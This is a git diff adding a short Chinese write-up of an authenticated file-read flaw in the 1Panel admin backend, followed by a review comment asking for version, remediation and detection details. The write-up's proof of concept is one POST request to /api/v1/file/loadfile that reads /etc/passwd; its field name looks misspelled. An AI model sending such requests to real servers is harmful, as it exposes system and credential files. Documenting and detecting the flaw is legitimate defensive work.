diff --git a/document/1Panel后台/1Panel loadfile 后台文件读取漏洞.assets/image-20230815142616338.png b/document/1Panel后台/1Panel loadfile 后台文件读取漏洞.assets/image-20230815142616338.png
new file mode 100644
index 0000000..bbde4cc
Binary files /dev/null and b/document/1Panel后台/1Panel loadfile 后台文件读取漏洞.assets/image-20230815142616338.png differ
diff --git a/document/1Panel后台/1Panel loadfile 后台文件读取漏洞.assets/image-20230815142623048.png b/document/1Panel后台/1Panel loadfile 后台文件读取漏洞.assets/image-20230815142623048.png
new file mode 100644
index 0000000..7b38277
Binary files /dev/null and b/document/1Panel后台/1Panel loadfile 后台文件读取漏洞.assets/image-20230815142623048.png differ
diff --git a/document/1Panel后台/1Panel loadfile 后台文件读取漏洞.assets/image-20230815142629323.png b/document/1Panel后台/1Panel loadfile 后台文件读取漏洞.assets/image-20230815142629323.png
new file mode 100644
index 0000000..662bde1
Binary files /dev/null and b/document/1Panel后台/1Panel loadfile 后台文件读取漏洞.assets/image-20230815142629323.png differ
diff --git a/document/1Panel后台/1Panel loadfile 后台文件读取漏洞.md b/document/1Panel后台/1Panel loadfile 后台文件读取漏洞.md
new file mode 100644
index 0000000..76d69d2
--- /dev/null
+++ b/document/1Panel后台/1Panel loadfile 后台文件读取漏洞.md
@@ -0,0 +1,17 @@
+**漏洞描述**
+
+1Panel后台存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中的敏感信息文件
+
+POC
+
+POST /api/v1/file/loadfile {"paht":"/etc/passwd"}
+
+**漏洞复现**
+
+登陆页面
+
+![image-20230815142616338](./1Panel loadfile 后台文件读取漏洞.assets/image-20230815142616338.png)
+
+![image-20230815142623048](./1Panel loadfile 后台文件读取漏洞.assets/image-20230815142623048.png)
+
+![image-20230815142629323](./1Panel loadfile 后台文件读取漏洞.assets/image-20230815142629323.png)
\ No newline at end of file
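Review bot: The new write-up ends at the request line and three screenshots without stating which 1Panel versions are affected, that the route sits behind the admin login (only 后台 in the title and the 登陆页面 line hint at it), or how to remediate. I would add two short sections in the file's existing bold-heading style, `**影响版本**` and `**修复建议**`, filled in from the vendor advisory (placeholder: `<fixed version per vendor advisory>`), with guidance to upgrade and to keep the panel's management port off untrusted networks. The field name in the body of the `POST /api/v1/file/loadfile` line should be verified against the vendor's API before the text is reused as a detection signature. For defenders, requests to that route whose body names system files such as the example's `/etc/passwd` make a useful alert condition and are worth mentioning in the remediation section.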